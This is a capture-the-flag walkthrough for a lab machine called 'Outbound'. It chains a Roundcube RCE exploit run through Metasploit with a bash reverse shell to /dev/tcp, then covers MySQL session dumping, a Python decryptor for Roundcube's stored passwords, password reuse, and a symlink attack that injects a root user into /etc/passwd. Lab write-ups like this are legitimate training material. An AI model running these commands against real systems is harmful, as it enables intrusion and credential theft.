Outbound

Outbound
[Link]

IP

[Link]

Hosts

[Link] [Link]

Info

As is common in real life pentests, you will start the Outbound box with credentials for the following
account tyler / LhKL1o9Nm3X2

Nmap Results

Web Enumeartion
Whe go to [Link]
Login with the given Creds

Roundcube Webmail 1.6.10 is Running

CVE-2025-49113 Metasploit
A Remote Code Execution ( RCE ) exploit is available for this version of Roundcube
[Link]
Whe need to i nsert the Modul manual ore Update Metasploit (not testet!!!)
Create this file (maybe need to create Directorys First)
Insert the exploit code [Link]

nano ~/.msf4/modules/exploits/linux/http/roundcube_auth_rce_cve_2025_49113.rb

We launch the Metasploit Framework

msfconsole

We reload all custom Metasploit modules

reload_all

We select the Roundcube RCE exploit module

use exploit/linux/http/roundcube_auth_rce_cve_2025_49113

Use this config

set HOST [Link]

set RHOSTS [Link]

set USERNAME tyler

set PASSWORD LhKL1o9Nm3X2

set LHOST tun0

set VHOST [Link]

run

Stable Shell

Switch to Shell in Metasploit

shell

We spawn an interactive Bash shell

bash -i

Start in new Terminal

pwncat-cs -lp 4444

We establish a reverse shell to our listener

bash -i >& /dev/tcp/[Link].x/4444 0>&1

Whe got a stable Shell

Dump mysql
We read the Roundcube configuration file

cat /var/www/html/roundcube/config/[Link]

Whe found Creds for mysql

We access the Roundcube MySQL database

PW = RCDBPass2025

mysql -u roundcube -p

We enumerate active Roundcube sessions from the database

use roundcube;
select * from session;

Whe Got that Base64 Output

Use this Recipte in CyberChef

[Link]
9%2B/%3D',true,false)&input=YkdGdVozVmhaMlY4Y3pvMU9pSmxibDlWVXlJN2FXMWhjRjl1WVcxbGMzQmhZMlY4W
VRvME9udHpPamc2SW5CbGNuTnZibUZzSWp0aE9qRTZlMms2TUR0aE9qSTZlMms2TUR0ek9qQTZJaUk3YVRveE8zTTZNVG
9pTHlJN2ZYMXpPalU2SW05MGFHVnlJanRPTzNNNk5qb2ljMmhoY21Wa0lqdE9PM002TVRBNkluQnlaV1pwZUY5dmRYUWl
PM002TURvaUlqdDlhVzFoY0Y5a1pXeHBiV2wwWlhKOGN6b3hPaUl2SWp0cGJXRndYMnhwYzNSZlkyOXVabnhoT2pJNmUy
azZNRHRPTzJrNk1UdGhPakE2ZTMxOWRYTmxjbDlwWkh4cE9qRTdkWE5sY201aGJXVjhjem8xT2lKcVlXTnZZaUk3YzNSd
mNtRm5aVjlvYjNOMGZITTZPVG9pYkc5allXeG9iM04wSWp0emRHOXlZV2RsWDNCdmNuUjhhVG94TkRNN2MzUnZjbUZuWl
Y5emMyeDhZam93TzNCaGMzTjNiM0prZkhNNk16STZJa3czVW5Zd01FRTRWSFYzU2tGeU5qZHJTVlI0ZUdOVFoyNUphekk
xUVcwdklqdHNiMmRwYmw5MGFXMWxmR2s2TVRjME9UTTVOekV4T1R0MGFXMWxlbTl1Wlh4ek9qRXpPaUpGZFhKdmNHVXZU
Rzl1Wkc5dUlqdFRWRTlTUVVkRlgxTlFSVU5KUVV3dFZWTkZmR0k2TVR0aGRYUm9YM05sWTNKbGRIeHpPakkyT2lKRWNGb
Hhkalp0WVVrNVNIaEVURFZIYUdORFpEaEtZVkZSVnlJN2NtVnhkV1Z6ZEY5MGIydGxibnh6T2pNeU9pSlVTWE5QWVVGQ1
FURjZTRk5ZV2s5Q2NFZzJkWEExV0VaNVlYbE9Va2hoZHlJN2RHRnphM3h6T2pRNkltMWhhV3dpTzNOcmFXNWZZMjl1Wm1
sbmZHRTZOenA3Y3pveE56b2ljM1Z3Y0c5eWRHVmtYMnhoZVc5MWRITWlPMkU2TVRwN2FUb3dPM002TVRBNkluZHBaR1Z6
WTNKbFpXNGlPMzF6T2pJeU9pSnFjWFZsY25sZmRXbGZZMjlzYjNKelgzUm9aVzFsSWp0ek9qazZJbUp2YjNSemRISmhjQ
0k3Y3pveE9Eb2laVzFpWldSZlkzTnpYMnh2WTJGMGFXOXVJanR6T2pFM09pSXZjM1I1YkdWekwyVnRZbVZrTG1OemN5ST
djem94T1RvaVpXUnBkRzl5WDJOemMxOXNiMk5oZEdsdmJpSTdjem94TnpvaUwzTjBlV3hsY3k5bGJXSmxaQzVqYzNNaU8
zTTZNVGM2SW1SaGNtdGZiVzlrWlY5emRYQndiM0owSWp0aU9qRTdjem95TmpvaWJXVmthV0ZmWW5KdmQzTmxjbDlqYzNO
ZmJHOWpZWFJwYjI0aU8zTTZORG9pYm05dVpTSTdjem95TVRvaVlXUmthWFJwYjI1aGJGOXNiMmR2WDNSNWNHVnpJanRoT
2pNNmUyazZNRHR6T2pRNkltUmhjbXNpTzJrNk1UdHpPalU2SW5OdFlXeHNJanRwT2pJN2N6b3hNRG9pYzIxaGJHd3RaR0
Z5YXlJN2ZYMXBiV0Z3WDJodmMzUjhjem81T2lKc2IyTmhiR2h2YzNRaU8zQmhaMlY4YVRveE8yMWliM2g4Y3pvMU9pSkp
Ua0pQV0NJN2MyOXlkRjlqYjJ4OGN6b3dPaUlpTzNOdmNuUmZiM0prWlhKOGN6bzBPaUpFUlZORElqdFRWRTlTUVVkRlgx
UklVa1ZCUkh4aE9qTTZlMms2TUR0ek9qRXdPaUpTUlVaRlVrVk9RMFZUSWp0cE9qRTdjem8wT2lKU1JVWlRJanRwT2pJN
2N6b3hORG9pVDFKRVJWSkZSRk5WUWtwRlExUWlPMzFUVkU5U1FVZEZYMUZWVDFSQmZHSTZNRHRUVkU5U1FVZEZYMHhKVT
FRdFJWaFVSVTVFUlVSOFlqb3hPMnhwYzNSZllYUjBjbWxpZkdFNk5qcDdjem8wT2lKdVlXMWxJanR6T2pnNkltMWxjM05
oWjJWeklqdHpPakk2SW1sa0lqdHpPakV4T2lKdFpYTnpZV2RsYkdsemRDSTdjem8xT2lKamJHRnpjeUk3Y3pvME1qb2li
R2x6ZEdsdVp5QnRaWE56WVdkbGJHbHpkQ0J6YjNKMGFHVmhaR1Z5SUdacGVHVmthR1ZoWkdWeUlqdHpPakUxT2lKaGNtb
GhMV3hoWW1Wc2JHVmtZbmtpTzNNNk1qSTZJbUZ5YVdFdGJHRmlaV3d0YldWemMyRm5aV3hwYzNRaU8zTTZPVG9pWkdGMF
lTMXNhWE4wSWp0ek9qRXlPaUp0WlhOellXZGxYMnhwYzNRaU8zTTZNVFE2SW1SaGRHRXRiR0ZpWld3dGJYTm5JanR6T2p
FNE9pSlVhR1VnYkdsemRDQnBjeUJsYlhCMGVTNGlPMzExYm5ObFpXNWZZMjkxYm5SOFlUb3lPbnR6T2pVNklrbE9RazlZ
SWp0cE9qSTdjem8xT2lKVWNtRnphQ0k3YVRvd08zMW1iMnhrWlhKemZHRTZNVHA3Y3pvMU9pSkpUa0pQV0NJN1lUb3lPb
nR6T2pNNkltTnVkQ0k3YVRveU8zTTZOam9pYldGNGRXbGtJanRwT2pNN2ZYMXNhWE4wWDIxdlpGOXpaWEY4Y3pveU9pSX
hNQ0k3

Whe got for User jacob

password': 'XSmAj9zglsmjumju+p3Aj+qgQRsA5Ph9/'
auth_secret': 'CVvn8qDVaBwlTik1kqK9j49n0V'
request_token': 'MYMqDlFldDIJnhSHnRAIQk25gbLBtkC3

Whe use this Python Skript to Decrypt the Password

[Link]

from base64 import b64decode

from [Link] import DES3

# --- Inputs ---

key = b'rcmail-!24ByteDESkey*Str' # 24-byte DES-EDE3 key

# Encrypted values (base64)

data = {
'password': 'XSmAj9zglsmjumju+p3Aj+qgQRsA5Ph9/',
'auth_secret': 'CVvn8qDVaBwlTik1kqK9j49n0V',
'request_token': 'MYMqDlFldDIJnhSHnRAIQk25gbLBtkC3'
}

def decrypt_des3_cbc(value, key):

try:
raw = b64decode(value)
iv = raw[:8]
cipher_text = raw[8:]
cipher = [Link](key, DES3.MODE_CBC, iv)
decrypted = [Link](cipher_text)

# Strip null bytes and last padding byte (mimics PHP rtrim + substr)
decrypted = [Link](b'\x00')[:-1]
return [Link](errors='replace')
except Exception as e:
return f"[ERROR] {e}"

# Decrypt all
for k, v in [Link]():
result = decrypt_des3_cbc(v, key)
print(f"[+] Decrypted {k}: {result}")

Run the Script

python3 [Link]

Whe got the PW 595mO8DmwGeD

User jacob
Whe switch to jacob (SSH not possible)
PW 595mO8DmwGeD

su jacob

Roundcube is not running on the main host — it is isolated within a container

ip a

We read Jacob’s email inbox for sensitive information

cat /home/jacob/mail/INBOX/jacob

Whe got another PW from jacob gY4Wr3a1evp4

And whe got information that whe higher privileges on log Files 🤔

We connect to the main host via SSH using the discovered password

ssh jacob@[Link]

ip a

Now whe on the main Host

User Flag 🏁
Whe got the User Flag

cat /home/jacob/[Link]

PRIVESC
We check the log directories based on the hint found in the email

ls -lR /var/log/

The file /var/log/below/error_root.log has the permission -rw-rw-rw- (mode 0666 ), meaning it is
writable by everyone, including unprivileged users. This misconfiguration allows a non-root user to
overwrite or replace the file, making it a prime target for exploitation (e.g., via symlink attacks).

We exploit a symlink vulnerability with this one-liner to create a root shell user

echo 'pwn::0:0:pwn:/root:/bin/bash' > /tmp/fakepass && rm -f /var/log/below/error_root.log &&

ln -s /etc/passwd /var/log/below/error_root.log && cp /tmp/fakepass
/var/log/below/error_root.log && su pwn

Root Flag 🏁💀
Whe got the Root Flag

cat /root/[Link]

Bug

If you receive the error

cp: cannot create regular file '/var/log/below/error_root.log': Permission denied

It means the file error_root.log is likely being recreated by a root process, preventing the symlink
from pointing to /etc/passwd .

To bypass this, use the following loop to repeatedly attempt the symlink overwrite until it succeeds:

while true; do
rm -f /var/log/below/error_root.log
ln -s /etc/passwd /var/log/below/error_root.log
cp /tmp/fakepass /var/log/below/error_root.log && break
done

After that, run:

su pwn

This gives you a root shell using the fake entry injected into /etc/passwd .

By 2ubZ3r0

1/1